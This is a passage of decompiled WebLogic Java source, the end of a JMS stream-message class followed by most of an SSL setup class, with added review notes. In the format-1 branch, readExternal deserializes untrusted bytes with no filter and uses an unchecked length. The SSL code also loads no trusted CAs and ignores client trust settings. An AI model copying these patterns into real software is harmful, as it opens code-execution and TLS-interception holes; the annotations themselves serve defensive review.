 */
public MessageImpl copy() throws JMSException {
    final StreamMessageImpl duplicate = new StreamMessageImpl();
    super.copy(duplicate);
    if (this.bdos == null) {
        duplicate.buffer = this.buffer;
        duplicate.length = this.length;
    } else {
        duplicate.buffer = this.bdos.getBuffer();
        duplicate.length = this.bdos.size();
        this.copyOnWrite = true;
    }
    duplicate.setBodyWritable(false);
    duplicate.setPropertiesWritable(false);
    return duplicate;
}
/**
 * Ensures the message is in write mode and has an output stream to write to.
 *
 * <p>Creates the output stream with an initial size of 256 when none exists.
 * When one exists and the copy-on-write flag is set, the stream copies its
 * buffer and the flag is cleared.
 *
 * @throws JMSException if the parent refuses write mode
 */
private void checkWritable() throws JMSException {
    super.writeMode();
    if (this.bdos == null) {
        this.bdos = new BufferDataOutputStream((ObjectIOBypass) null, 256);
        return;
    }
    if (this.copyOnWrite) {
        this.bdos.copyBuffer();
        this.copyOnWrite = false;
    }
}
/**
 * Ensures the message is in read mode and has an input stream over its body.
 *
 * <p>The input stream is created lazily over the first {@code length} bytes
 * of {@code buffer}.
 *
 * @throws JMSException if the parent refuses read mode, or (as a
 *         {@code MessageEOFException}) if the body is absent or empty
 */
private void checkReadable() throws JMSException {
    super.readMode();
    final boolean bodyMissing = this.buffer == null || this.length == 0;
    if (bodyMissing) {
        throw new weblogic.jms.common.MessageEOFException(this.readPastEnd());
    }
    if (this.bdis == null) {
        this.bdis = new BufferDataInputStream((ObjectIOBypass) null, this.buffer, 0, this.length);
    }
}
/**
 * Returns a short description of the form {@code StreamMessage[<message id>]}.
 *
 * @return the description string
 */
public String toString() {
    final StringBuilder text = new StringBuilder("StreamMessage[");
    text.append(this.getJMSMessageID());
    text.append("]");
    return text.toString();
}
/**
 * Serializes the message: the parent state, then a format byte of 1, the
 * value of getDataSize() and the array returned by getDataBuffer().
 *
 * The version-aware and compression-aware logic is retained below only as
 * commented-out code; the active code always emits format byte 1.
 *
 * NOTE(review): format 1 is the branch of readExternal in this file that
 * hands the body to an ObjectInputStream. A receiver that accepts this
 * encoding from an untrusted peer needs a deserialization allow-list on
 * that path.
 *
 * @param paramObjectOutput destination stream
 * @throws IOException if writing fails
 */
public void writeExternal(ObjectOutput paramObjectOutput) throws IOException {
super.writeExternal(paramObjectOutput);
paramObjectOutput.writeByte(1);
paramObjectOutput.writeInt(getDataSize());
paramObjectOutput.write(getDataBuffer());
// super.writeExternal(var1);
// int var3 = 2147483647;
// ObjectOutput var2;
// if(var1 instanceof JMSObjectOutputWrapper) {
// var3 = ((JMSObjectOutputWrapper)var1).getCompressionThreshold();
// var2 = ((JMSObjectOutputWrapper)var1).getInnerObjectOutput();
// } else {
// var2 = var1;
// }
//
// byte var4;
// if(this.getVersion(var2) >= 30) {
// var4 = (byte)(3 | (this.shouldCompress(var2, var3)?-128:0));
// } else {
// var4 = 2;
// }
//
// var2.writeByte(var4);
// byte[] var5;
// int var6;
// if(this.bdos != null) {
// var5 = this.bdos.getBuffer();
// var6 = this.bdos.size();
// } else {
// var5 = this.buffer;
// var6 = this.length;
// }
//
// if(this.isCompressed()) {
// if(var4 == 2) {
// byte[] var7 = this.decompress();
// var2.writeInt(var7.length);
// var2.write(var7, 0, var7.length);
// } else {
// this.flushCompressedMessageBody(var2);
// }
// } else if((var4 & -128) != 0) {
// this.compressByteArray(var2, var5, var6);
// } else if(var5 != null && var6 != 0) {
// var2.writeInt(var6);
// var2.write(var5, 0, var6);
// } else {
// var2.writeInt(0);
// }
}
/**
 * Replaces a compressed body with its decompressed bytes.
 *
 * <p>Does nothing when the message is not compressed. The compressed body is
 * cleaned up whether or not decompression succeeds.
 *
 * @throws JMSException if decompression fails with an I/O error
 */
public final void decompressMessageBody() throws JMSException {
    if (!this.isCompressed()) {
        return;
    }
    try {
        this.buffer = this.decompress();
        this.length = this.buffer.length;
    } catch (IOException inflateFailure) {
        throw new weblogic.jms.common.JMSException(JMSClientExceptionLogger.logErrorDecompressMessageBodyLoggable().getMessage(), inflateFailure);
    } finally {
        this.cleanupCompressedMessageBody();
    }
}
/**
 * Restores the message from var1: the parent state, then a flag byte whose
 * low seven bits select the body format (1 to 3) and whose high bit is
 * tested in the format-3 branch.
 *
 * Format 1: the body is read into buffer, wrapped in an ObjectInputStream,
 * and every object read from it is re-encoded through writeObject until the
 * stream reports EOF. Format 2, and format 3 with the high bit clear: the
 * body is a length-prefixed byte array stored as-is. Format 3 with the high
 * bit set: the body is handed to saveCompressedMessageBody.
 *
 * SECURITY NOTE(review): in format 1, ObjectInputStream.readObject() runs on
 * bytes taken from the input with no ObjectInputFilter or class allow-list,
 * and writeObject's type check only runs after each object has been fully
 * deserialized. If var1 can carry data from an untrusted peer this is an
 * unsafe-deserialization sink; restrict it with a filter that admits only
 * the types writeObject accepts, or reject format 1.
 *
 * @param var1 source stream
 * @throws IOException if reading fails or the format is outside 1 to 3
 * @throws ClassNotFoundException if a class named in a format-1 body cannot
 *         be resolved
 */
public void readExternal(ObjectInput var1) throws IOException, ClassNotFoundException {
super.readExternal(var1);
byte var2 = var1.readByte();
// Low seven bits: body format. High bit: checked in case 3 below.
byte var3 = (byte) (var2 & 127);
if (var3 >= 1 && var3 <= 3) {
switch (var3) {
case 1:
// NOTE(review): the length comes from the stream and is used unchecked; a
// negative value throws NegativeArraySizeException and a large one
// allocates that many bytes before any data is read.
this.length = var1.readInt();
this.buffer = new byte[this.length];
var1.readFully(this.buffer);
ByteArrayInputStream var4 = new ByteArrayInputStream(this.buffer);
// Unfiltered native deserialization of the body - see the security note above.
ObjectInputStream var5 = new ObjectInputStream(var4);
this.setBodyWritable(true);
this.setPropertiesWritable(true);
try {
// The loop ends only through an exception; EOFException is the normal exit.
while (true) {
this.writeObject(var5.readObject());
}
} catch (EOFException var9) {
try {
this.reset();
this.setPropertiesWritable(false);
// Trim the adopted buffer to exactly length bytes.
byte[] var7 = new byte[this.length];
System.arraycopy(this.buffer, 0, var7, 0, this.length);
this.buffer = var7;
} catch (JMSException var8) {
JMSClientExceptionLogger.logStackTrace(var8);
}
// The remaining handlers log the failure and return normally.
} catch (MessageNotWriteableException var10) {
JMSClientExceptionLogger.logStackTrace(var10);
} catch (javax.jms.MessageFormatException var11) {
JMSClientExceptionLogger.logStackTrace(var11);
} catch (JMSException var12) {
JMSClientExceptionLogger.logStackTrace(var12);
}
break;
case 3:
if ((var2 & -128) != 0) {
this.saveCompressedMessageBody(var1);
break;
}
// High bit clear: falls through to the format-2 handling.
case 2:
if ((this.length = var1.readInt()) > 0) {
this.buffer = new byte[this.length];
var1.readFully(this.buffer);
}
}
} else {
throw JMSUtilities.versionIOException(var3, 1, 3);
}
}
/**
 * Returns the size of the message body in bytes.
 *
 * <p>A compressed message reports its compressed body size. Otherwise a
 * cached {@code bodySize} other than -1 is returned. Failing that, the size
 * is taken from {@code length} when a buffer exists (and cached), from the
 * output stream when one exists (not cached), or is 0 (and cached).
 *
 * @return the payload size
 */
public long getPayloadSize() {
    if (this.isCompressed()) {
        return (long) this.getCompressedMessageBodySize();
    }
    if (super.bodySize != -1L) {
        return super.bodySize;
    }
    if (this.buffer != null) {
        final long bufferedSize = (long) this.length;
        super.bodySize = bufferedSize;
        return bufferedSize;
    }
    if (this.bdos != null) {
        return (long) this.bdos.size();
    }
    super.bodySize = 0L;
    return 0L;
}
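/**
 * Maps a type code to its display name for error messages.
 *
 * <p>Change from the decompiled original: an explicit range check replaces
 * {@code catch (Throwable)}, which used an exception for control flow and
 * would also have intercepted unrelated errors such as
 * {@code OutOfMemoryError}.
 *
 * @param var1 type code read from the stream
 * @return the matching entry of {@code TYPE_CODE_STRINGS}, or entry 0 when
 *         the code is outside the table
 */
private String typeCodeToString(int var1) {
    final boolean inTable = var1 >= 0 && var1 < TYPE_CODE_STRINGS.length;
    return inTable ? TYPE_CODE_STRINGS[var1] : TYPE_CODE_STRINGS[0];
}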
/**
 * Writes a non-null string element, choosing the encoding by length.
 *
 * <p>Strings longer than 20000 characters are written with type code 10 and
 * {@code writeUTF32}; all others use type code 9 and {@code writeUTF}.
 *
 * @param var1 string to write; must not be null
 * @throws IOException if the underlying stream write fails
 * @throws JMSException if writing the type code fails
 */
private void writeStringInternal(String var1) throws IOException, JMSException {
    final boolean useLongForm = var1.length() > 20000;
    if (!useLongForm) {
        this.writeType((byte) 9);
        this.bdos.writeUTF(var1);
        return;
    }
    this.writeType((byte) 10);
    this.bdos.writeUTF32(var1);
}
/**
 * Reads a string payload using the decoder that matches its type code.
 *
 * @param var1 type code of the element; 10 selects {@code readUTF32}, any
 *        other value selects {@code readUTF}
 * @return the decoded string
 * @throws IOException if the underlying stream read fails
 */
private String readStringInternal(byte var1) throws IOException {
    if (var1 == 10) {
        return this.bdis.readUTF32();
    }
    return this.bdis.readUTF();
}
/**
 * Returns the array that currently backs the message body.
 *
 * <p>The array itself is returned, not a copy: the output stream's buffer
 * when an output stream exists, otherwise the {@code buffer} field.
 *
 * @return the backing array; may be {@code null} when neither is set
 */
public final byte[] getDataBuffer() {
    if (this.bdos == null) {
        return this.buffer;
    }
    return this.bdos.getBuffer();
}
/**
 * Returns the number of body bytes: the output stream's size when an output
 * stream exists, otherwise the {@code length} field.
 *
 * @return the body size in bytes
 */
public final int getDataSize() {
    if (this.bdos == null) {
        return this.length;
    }
    return this.bdos.size();
}
/**
 * Installs a body buffer and its length.
 *
 * <p>The array reference is stored as given (no copy), and the length is not
 * checked against the array size.
 *
 * @param var1 new backing array
 * @param var2 number of valid bytes in var1
 */
public final void setDataBuffer(byte[] var1, int var2) {
    this.length = var2;
    this.buffer = var1;
}
/**
 * Returns the uncompressed message body and reports its size through var1.
 *
 * <p>For an uncompressed message the backing array is returned and the size
 * comes from {@code getDataSize()}. For a compressed message the body is
 * decompressed and the size is the decompressed array length.
 *
 * @param var1 out-parameter; element 0 receives the body size
 * @return the body bytes
 * @throws JMSException if decompression fails with an I/O error
 */
public byte[] getMessageBody(int[] var1) throws JMSException {
    if (this.isCompressed()) {
        try {
            final byte[] inflated = this.decompress();
            var1[0] = inflated.length;
            return inflated;
        } catch (IOException inflateFailure) {
            throw new weblogic.jms.common.JMSException(JMSClientExceptionLogger.logErrorDecompressMessageBodyLoggable().getMessage(), inflateFailure);
        }
    }
    var1[0] = this.getDataSize();
    return this.getDataBuffer();
}
}
================================================
FILE: src/weblogic/security/utils/SSLSetup.java
================================================
//
// Source code recreated from a .class file by IntelliJ IDEA
// (powered by Fernflower decompiler)
//
package weblogic.security.utils;
import java.io.FileInputStream;
import java.io.InputStream;
import java.net.InetAddress;
import java.net.SocketException;
import java.security.AccessController;
import java.security.KeyManagementException;
import java.security.KeyStore;
import java.security.PrivateKey;
import java.security.cert.CertificateException;
import java.security.cert.CertificateFactory;
import java.security.cert.X509Certificate;
import java.util.ArrayList;
import java.util.Properties;
import javax.net.ssl.SSLSession;
import javax.net.ssl.SSLSocket;
import weblogic.kernel.Kernel;
import weblogic.logging.Loggable;
import weblogic.management.configuration.ServerMBean;
import weblogic.management.provider.CommandLine;
import weblogic.management.provider.ManagementService;
import weblogic.security.SecurityLogger;
import weblogic.security.SSL.HostnameVerifier;
import weblogic.security.SSL.SSLClientInfo;
import weblogic.security.SSL.TrustManager;
import weblogic.security.acl.internal.AuthenticatedSubject;
import weblogic.security.service.PrivilegedActions;
import weblogic.security.service.SecurityServiceManager;
public final class SSLSetup extends SSLSetupLogging {
// IO model identifiers; 0 and 1 are the only values setIOModel accepts.
public static final int STANDARD_IO = 0;
public static final int MUXING_IO = 1;
// License level identifiers. getLicenseLevel uses the literals -1 and 1,
// which match LICENSE_NOT_CHECKED and LICENSE_DOMESTIC.
public static final int LICENSE_NOT_CHECKED = -1;
public static final int LICENSE_NONE = 0;
public static final int LICENSE_DOMESTIC = 1;
public static final int LICENSE_EXPORT = 2;
// Kernel identity obtained through a privileged action; logSSLRejections
// passes it to ManagementService.getRuntimeAccess.
private static final AuthenticatedSubject kernelId = (AuthenticatedSubject)AccessController.doPrivileged(PrivilegedActions.getKernelIdentityAction());
// SSLSession value name under which failure details are stored.
public static final String FAILURE_DETAILS = "weblogic.security.ssl.failureDetails";
// Set by getIOModel; once true, setIOModel refuses further changes.
private static boolean ioModelAccessed = false;
private static int ioModel = 0;
// Stays at -1 until getLicenseLevel has run.
private static int licenseLevel = -1;
private static int debugLevel = 0;
// Lazily resolved by getProtocolVersion; the default 3 is the value "ALL" selects.
private static boolean protocolVersionChecked = false;
private static int protocolVersion = 3;
// Lazily resolved by getEnforceConstraints; the default 1 is the value "strong"/"true" selects.
private static boolean enforceConstraintsChecked = false;
private static int enforceConstraints = 1;
// Delegate class names. getLicenseLevel selects the Certicom name (as a literal).
private static final String CERTICOM_DELEGATE = "com.bea.sslplus.CerticomSSLContext";
private static final String RSA_DELEGATE = "com.rsa.ssl.WeblogicContextWrapper";
// Class loaded by setSSLDelegate and instantiated by getSSLDelegateInstance.
private static Class sslDelegateClass = null;
/** Public no-argument constructor; it performs no initialisation. */
public SSLSetup() {
}
/**
 * Returns the license level, initialising it on first use.
 *
 * <p>On first use the level is set to 1 and the Certicom SSL delegate class
 * is loaded through {@code setSSLDelegate}.
 *
 * <p>NOTE(review): the level is assigned before {@code setSSLDelegate} runs,
 * so if loading the delegate throws, later calls return 1 without retrying
 * the load.
 *
 * @return the license level
 */
public static synchronized int getLicenseLevel() {
    if (licenseLevel <= -1) {
        licenseLevel = 1;
        final String delegateClassName = "com.bea.sslplus.CerticomSSLContext";
        info("Use Certicom SSL with Domestic strength");
        setSSLDelegate(delegateClassName);
    }
    return licenseLevel;
}
/**
 * Requests IO model 1 (muxing) for server use and logs that it was enabled.
 *
 * <p>The message is logged unconditionally, including when
 * {@code setIOModel} declines the change.
 */
public static synchronized void initForServer() {
    final int muxingModel = 1;
    setIOModel(muxingModel);
    info("Enabled muxing IO for SSL in server");
}
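/**
 * Loads the SSL delegate class by name and records it for later
 * instantiation.
 *
 * <p>Change from the decompiled original: the class is validated before it
 * is stored. Previously {@code sslDelegateClass} was assigned first, so a
 * class that does not implement {@code SSLContextDelegate} stayed in the
 * static field after the exception and would fail later with a
 * {@code ClassCastException} in {@code getSSLDelegateInstance}.
 *
 * @param var0 fully qualified name of the delegate class
 * @throws IllegalArgumentException if the class cannot be found or does not
 *         implement {@code SSLContextDelegate}
 */
private static void setSSLDelegate(String var0) {
    final Class candidate;
    try {
        candidate = Class.forName(var0);
    } catch (ClassNotFoundException notFound) {
        final String message = SecurityLogger.getClassNotFound(var0);
        throw new IllegalArgumentException(message, notFound);
    }
    if (!SSLContextDelegate.class.isAssignableFrom(candidate)) {
        final String message = "Cannot initialize SSL implementation. " + var0 + " does not implement " + SSLContextDelegate.class.getName();
        throw new IllegalArgumentException(message);
    }
    // Publish only a class that passed the type check.
    sslDelegateClass = candidate;
}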
/**
 * Creates a new instance of the configured SSL delegate class.
 *
 * <p>Triggers {@code getLicenseLevel()} first when the license level is
 * still -1, which is what loads the delegate class.
 *
 * @return a new delegate instance
 * @throws RuntimeException if the class cannot be accessed or instantiated
 */
static SSLContextDelegate getSSLDelegateInstance() {
    if (licenseLevel == -1) {
        getLicenseLevel();
    }
    // return new SSLContextDelegateImpl();
    try {
        return (SSLContextDelegate) sslDelegateClass.newInstance();
    } catch (IllegalAccessException accessDenied) {
        final String message = SecurityLogger.getIllegalAccessOnContextWrapper(sslDelegateClass.getName());
        throw new RuntimeException(message, accessDenied);
    } catch (InstantiationException cannotCreate) {
        final String message = SecurityLogger.getInstantiationExcOnContextWrapper(sslDelegateClass.getName());
        throw new RuntimeException(message, cannotCreate);
    }
}
/**
 * Returns the current IO model and records that it has been read.
 *
 * <p>After the first call, {@code setIOModel} no longer changes the model.
 *
 * @return the IO model value
 */
public static int getIOModel() {
    final int current = ioModel;
    ioModelAccessed = true;
    return current;
}
/**
 * Tells whether SSL rejections should be logged.
 *
 * <p>Applets never log; non-server processes always log; a server consults
 * the SSL configuration of its server MBean. A failure while reading that
 * setting is logged and treated as "do not log".
 *
 * @return {@code true} if rejections should be logged
 */
public static boolean logSSLRejections() {
    if (Kernel.isApplet()) {
        return false;
    }
    if (!Kernel.isServer()) {
        return true;
    }
    try {
        return ManagementService.getRuntimeAccess(kernelId).getServer().getSSL().isSSLRejectionLoggingEnabled();
    } catch (Exception lookupFailure) {
        info(lookupFailure, "Caught exception in SSLSetup.logSSLRejections");
        return false;
    }
}
/**
 * Changes the IO model, if the value is valid and the model has not been
 * read yet.
 *
 * <p>A rejected request is only reported through a debug message; no
 * exception is thrown.
 *
 * @param var0 requested model; only 0 and 1 are accepted
 */
public static void setIOModel(int var0) {
    final boolean knownModel = var0 == 0 || var0 == 1;
    if (!knownModel) {
        debug(2, "Attempt to change SSL IO model to invalid setting");
        return;
    }
    if (ioModelAccessed) {
        debug(2, "Attempt to change SSL IO model after access");
        return;
    }
    ioModel = var0;
}
/**
 * Returns the protocol version selector, resolving it from the command line
 * on first use.
 *
 * <p>The command-line value is matched case-insensitively: "SSL3" selects 1,
 * "TLS1" selects 0 and "ALL" selects 3. Any other value, a missing value, or
 * a {@code SecurityException} while reading it leaves the current value
 * (initially 3) in place.
 *
 * <p>NOTE(review): the default is the same value that "ALL" selects, and
 * "SSL3" is selectable on its own. If these selectors cause SSLv3 to be
 * offered, that protocol is obsolete - confirm how callers interpret the
 * returned value.
 *
 * @return the protocol version selector
 */
public static int getProtocolVersion() {
    if (protocolVersionChecked) {
        return protocolVersion;
    }
    try {
        final String requested = CommandLine.getCommandLine().getSSLVersion();
        if ("SSL3".equalsIgnoreCase(requested)) {
            protocolVersion = 1;
        } else if ("TLS1".equalsIgnoreCase(requested)) {
            protocolVersion = 0;
        } else if ("ALL".equalsIgnoreCase(requested)) {
            protocolVersion = 3;
        }
    } catch (SecurityException ignored) {
        // The setting could not be read; keep the current value.
    }
    protocolVersionChecked = true;
    return protocolVersion;
}
/**
 * Returns the constraint-enforcement level, resolving it from the command
 * line on first use.
 *
 * <p>The command-line value is matched case-insensitively: "off" or "false"
 * selects 0, "strong" or "true" selects 1 and "strict" selects 2. Any other
 * value, a missing value, or a {@code SecurityException} while reading it
 * leaves the current value (initially 1) in place.
 *
 * @return the enforcement level
 */
public static int getEnforceConstraints() {
    if (enforceConstraintsChecked) {
        return enforceConstraints;
    }
    try {
        final String requested = CommandLine.getCommandLine().getSSLEnforcementConstraint();
        if ("off".equalsIgnoreCase(requested) || "false".equalsIgnoreCase(requested)) {
            enforceConstraints = 0;
        } else if ("strong".equalsIgnoreCase(requested) || "true".equalsIgnoreCase(requested)) {
            enforceConstraints = 1;
        } else if ("strict".equalsIgnoreCase(requested)) {
            enforceConstraints = 2;
        }
    } catch (SecurityException ignored) {
        // The setting could not be read; keep the current value.
    }
    enforceConstraintsChecked = true;
    return enforceConstraints;
}
/**
 * Returns an SSL context built without client-specific settings.
 *
 * @return the context wrapper
 * @throws SocketException declared by the delegated overload
 */
public static SSLContextWrapper getSSLContext() throws SocketException {
    final SSLClientInfo noClientInfo = null;
    return getSSLContext(noClientInfo);
}
/**
 * Returns an SSL context, adding trusted CAs when any are available.
 *
 * <p>Outside an applet the result of {@code getTrustedCAs} is added to the
 * context; a failure while adding is only reported through a debug message.
 *
 * <p>NOTE(review): {@code var0} is ignored because the {@code applyInfo}
 * call is commented out, so a caller-supplied identity, TrustManager,
 * HostnameVerifier or expected name never reaches the context. In this file
 * {@code getTrustedCAs} also returns {@code null} unconditionally, so no
 * trust anchors are added here either. Whether peer authentication is
 * enforced elsewhere cannot be determined from this method - confirm before
 * relying on contexts it returns.
 *
 * @param var0 client settings; currently unused
 * @return the context wrapper
 * @throws SocketException declared; not thrown by the active code
 */
public static SSLContextWrapper getSSLContext(SSLClientInfo var0) throws SocketException {
    final SSLContextWrapper context = SSLContextWrapper.getInstance();
    final X509Certificate[] trustedCAs = Kernel.isApplet() ? null : getTrustedCAs(context);
    if (trustedCAs != null) {
        try {
            context.addTrustedCA(trustedCAs);
        } catch (Exception addFailure) {
            debug(2, addFailure, "Failure loading trusted CA list");
        }
    }
    // if(var0 != null) {
    // applyInfo(var1, var0);
    // }
    return context;
}
/**
 * No-op in this version: the entire body is commented out, and the call in
 * getSSLContext(SSLClientInfo) is commented out as well.
 *
 * The disabled code applied the client's certificate and key, a
 * programmatic TrustManager, legacy root CA fingerprints, a
 * HostnameVerifier and an expected peer name to the context.
 *
 * NOTE(review): with this disabled, none of those peer-authentication
 * settings take effect through this class.
 *
 * @param var0 context that would receive the settings
 * @param var1 client settings; unused
 * @throws SocketException declared; not thrown by the active code
 */
private static void applyInfo(SSLContextWrapper var0, SSLClientInfo var1) throws SocketException {
// InputStream[] var2 = var1.getSSLClientCertificate();
// if(var2 != null && var2.length >= 2) {
// info("clientInfo has old style certificate and key");
//
// try {
// String var3 = var1.getSSLClientKeyPassword();
// char[] var4 = null;
// if(var3 != null) {
// var4 = var3.toCharArray();
// }
//
// PrivateKey var5 = var0.inputPrivateKey(var2[0], var4);
// X509Certificate[] var6 = new X509Certificate[var2.length - 1];
// CertificateFactory var7 = CertificateFactory.getInstance("X.509");
//
// for(int var8 = 1; var8 < var2.length; ++var8) {
// var6[var8 - 1] = (X509Certificate)var7.generateCertificate(var2[var8]);
// }
//
// var0.addIdentity(var6, var5);
// info("client identity added");
// } catch (KeyManagementException var9) {
// info(var9, "Problem accessing private key");
// throw new SocketException(SecurityLogger.getProblemAccessingPrivateKey());
// } catch (CertificateException var10) {
// info(var10, "Problem with certificate chain");
// throw new SocketException(SecurityLogger.getProblemWithCertificateChain(var10.getMessage()));
// }
// }
//
// X509Certificate[] var11 = (X509Certificate[])var1.getClientLocalIdentityCert();
// PrivateKey var12 = var1.getClientLocalIdentityKey();
// if(var11 != null && var12 != null) {
// info("clientInfo has new style certificate and key");
// var0.addIdentity(var11, var12);
// }
//
// TrustManager var13 = var1.getTrustManager();
// if(var13 != null) {
// info("clientInfo has programmatic TrustManager");
// var0.getTrustManager().setTrustManager(var13);
// }
//
// byte[][] var14 = var1.getRootCAfingerprints();
// if(var14 != null) {
// info("Adding legacy rootCA fingerprints");
// var0.getTrustManager().setRootCAFingerPrints(var14);
// }
//
// HostnameVerifier var15 = var1.getHostnameVerifier();
// if(var15 != null) {
// info("clientInfo has HostnameVerifier");
// var0.getHostnameVerifier().setHostnameVerifier(var15);
// }
//
// String var16 = var1.getExpectedName();
// if(var16 != null) {
// info("clientInfo has expectedName");
// var0.getHostnameVerifier().setExpectedName(var16);
// }
}
/**
 * Always returns null in this version; the keystore-loading logic is kept
 * below only as commented-out code.
 *
 * The disabled code loaded trusted CA certificates from the command-line
 * trust keystore or the configured trust keystores (client side) or from
 * the server's trust configuration (server side).
 *
 * NOTE(review): because of the null result, getSSLContext never calls
 * addTrustedCA. Whether trust anchors are supplied by another component
 * cannot be determined from here - confirm.
 *
 * @param var0 context wrapper; unused
 * @return null
 */
private static X509Certificate[] getTrustedCAs(SSLContextWrapper var0) {
// X509Certificate[] var1 = null;
// String var2;
// KeyStoreInfo[] var3;
// if(!Kernel.isServer()) {
// var2 = CommandLine.getCommandLine().getSSLTrustCA();
// var3 = var2 != null?new KeyStoreInfo[]{new KeyStoreInfo(var2, "jks", (String)null)}:(new KeyStoreConfigurationHelper(ClientKeyStoreConfiguration.getInstance())).getTrustKeyStores();
// ArrayList var4 = new ArrayList();
//
// for(int var5 = 0; var3 != null && var5 < var3.length; ++var5) {
// info("Trusted CA keystore: " + var3[var5].getFileName());
//
// try {
// KeyStore var6 = KeyStore.getInstance(var3[var5].getType());
// FileInputStream var7 = new FileInputStream(var3[var5].getFileName());
// var6.load(var7, (char[])null);
// var4.addAll(SSLCertUtility.getX509Certificates(var6));
// var7.close();
// } catch (Exception var9) {
// debug(2, var9, "Failure loading trusted CA list from: " + var3[var5].getFileName());
// }
// }
//
// var1 = (X509Certificate[])((X509Certificate[])var4.toArray(new X509Certificate[var4.size()]));
// } else {
// info("SSLSetup: loading trusted CA certificates");
// if(SecurityServiceManager.isSecurityServiceInitialized()) {
// try {
// var1 = SSLContextManager.getServerTrustedCAs();
// } catch (Exception var8) {
// debug("Failed to load server trusted CAs", var8);
// }
// } else {
// debug(2, "SSLSetup: using pre-mbean command line configuration for SSL trust");
// var2 = CommandLine.getCommandLine().getSSLTrustCA();
// var3 = var2 != null?new KeyStoreInfo[]{new KeyStoreInfo(var2, "jks", (String)null)}:(new KeyStoreConfigurationHelper(PreMBeanKeyStoreConfiguration.getInstance())).getTrustKeyStores();
// var1 = SSLContextManager.getTrustedCAs(var3);
// }
// }
//
// return var1 != null && var1.length != 0?var1:null;
return null;
}
/**
 * Stores a failure description on the SSL session under the name
 * {@code weblogic.security.ssl.failureDetails}.
 *
 * @param var0 session to annotate
 * @param var1 failure description
 */
public static void setFailureDetails(SSLSession var0, String var1) {
    final String valueName = "weblogic.security.ssl.failureDetails";
    var0.putValue(valueName, var1);
}
/**
 * Returns the failure description stored on the SSL session under the name
 * {@code weblogic.security.ssl.failureDetails}.
 *
 * @param var0 session to query
 * @return the stored description, or {@code null} if none is stored
 */
public static String getFailureDetails(SSLSession var0) {
    final Object stored = var0.getValue("weblogic.security.ssl.failureDetails");
    return (String) stored;
}
/**
 * Reports a connection to the SSL port that used a plaintext protocol.
 *
 * <p>A debug message is always written. When rejection logging is enabled,
 * a log entry is written and its message is stored on the socket's session
 * as the failure details.
 *
 * <p>NOTE(review): {@code var1} is concatenated into the debug message
 * as-is. If it is derived from bytes sent by the peer, line breaks and
 * control characters should be neutralised before logging - confirm against
 * callers.
 *
 * @param var0 socket on which the connection arrived
 * @param var1 description of the plaintext protocol
 */
public static void logPlaintextProtocolClientError(SSLSocket var0, String var1) {
    final String peer = getPeerName(var0);
    debug(2, "Connection to SSL port was made from " + peer + " using plaintext protocol: " + var1);
    if (!logSSLRejections()) {
        return;
    }
    final Loggable entry = SecurityLogger.logPlaintextProtocolClientErrorLoggable(var1, peer);
    entry.log();
    setFailureDetails(var0.getSession(), entry.getMessage());
}
/**
 * Reports a connection whose protocol version was not recognised.
 *
 * <p>A debug message is always written. When rejection logging is enabled,
 * a log entry is written and its message is stored on the socket's session
 * as the failure details.
 *
 * @param var0 socket on which the connection arrived
 */
public static void logProtocolVersionError(SSLSocket var0) {
    final String peer = getPeerName(var0);
    debug(2, "Connection to SSL port from " + peer + " appears to be either unknown SSL version or maybe is plaintext");
    if (!logSSLRejections()) {
        return;
    }
    final Loggable entry = SecurityLogger.logProtocolVersionErrorLoggable(peer);
    entry.log();
    setFailureDetails(var0.getSession(), entry.getMessage());
}
/**
 * Reports a chain rejected under strict enforcement because a V3 CA
 * certificate carried basic constraints that were not marked critical.
 *
 * <p>A debug message is always written. When rejection logging is enabled,
 * a log entry is written and its message is stored on the socket's session
 * as the failure details.
 *
 * @param var0 socket whose peer presented the chain
 */
public static void logCertificateChainConstraintsStrictNonCriticalFailure(SSLSocket var0) {
    final String peer = getPeerName(var0);
    debug(2, "The certificate chain received from " + peer + " contained a V3 CA certificate which had basic constraints which were not marked critical, " + "this is being rejected due to the strict enforcement of basic constraints.");
    if (!logSSLRejections()) {
        return;
    }
    final Loggable entry = SecurityLogger.logCertificateChainConstraintsStrictNonCriticalFailureLoggable(peer);
    entry.log();
    setFailureDetails(var0.getSession(), entry.getMessage());
}
/**
 * Reports a chain containing a V3 CA certificate without the basic
 * constraints extension.
 *
 * <p>A debug message is always written. When rejection logging is enabled,
 * a log entry is written and its message is stored on the socket's session
 * as the failure details.
 *
 * @param var0 socket whose peer presented the chain
 */
public static void logCertificateChainMissingConstraintsFailure(SSLSocket var0) {
    final String peer = getPeerName(var0);
    debug(2, "The certificate chain received from " + peer + " contained a V3 CA certificate which was missing the basic constraints extension");
    if (!logSSLRejections()) {
        return;
    }
    final Loggable entry = SecurityLogger.logCertificateChainMissingConstraintsFailureLoggable(peer);
    entry.log();
    setFailureDetails(var0.getSession(), entry.getMessage());
}
/**
 * Reports a chain containing a V3 CA certificate whose basic constraints do
 * not mark it as a CA.
 *
 * <p>A debug message is always written. When rejection logging is enabled,
 * a log entry is written and its message is stored on the socket's session
 * as the failure details.
 *
 * @param var0 socket whose peer presented the chain
 */
public static void logCertificateChainNotACaConstraintsFailure(SSLSocket var0) {
    final String peer = getPeerName(var0);
    debug(2, "The certificate chain received from " + peer + " contained a V3 CA certificate which didn't indicate it really is a CA");
    if (!logSSLRejections()) {
        return;
    }
    final Loggable entry = SecurityLogger.logCertificateChainNotACaConstraintsFailureLoggable(peer);
    entry.log();
    setFailureDetails(var0.getSession(), entry.getMessage());
}
/**
 * Reports a chain that exceeds the path length stated in a V3 CA
 * certificate's basic constraints.
 *
 * <p>A debug message is always written. When rejection logging is enabled,
 * a log entry is written and its message is stored on the socket's session
 * as the failure details.
 *
 * @param var0 socket whose peer presented the chain
 */
public static void logCertificateChainPathLenExceededConstraintsFailure(SSLSocket var0) {
    final String peer = getPeerName(var0);
    debug(2, "The certificate chain received from " + peer + " contained a V3 CA certificate which indicated a certificate chain path length in the basic constraints that was exceeded");
    if (!logSSLRejections()) {
        return;
    }
    final Loggable entry = SecurityLogger.logCertificateChainPathLenExceededConstraintsFailureLoggable(peer);
    entry.log();
    setFailureDetails(var0.getSession(), entry.getMessage());
}
/**
 * Reports a chain containing a V3 CA certificate that could not be converted
 * for the basic constraints check.
 *
 * <p>A debug message is always written. When rejection logging is enabled,
 * a log entry is written and its message is stored on the socket's session
 * as the failure details.
 *
 * @param var0 socket whose peer presented the chain
 */
public static void logCertificateChainConstraintsConversionFailure(SSLSocket var0) {
    final String peer = getPeerName(var0);
    debug(2, "The certificate chain received from " + peer + " contained a V3 CA certificate which couldn't be converted to be checked for basic constraints.");
    if (!logSSLRejections()) {
        return;
    }
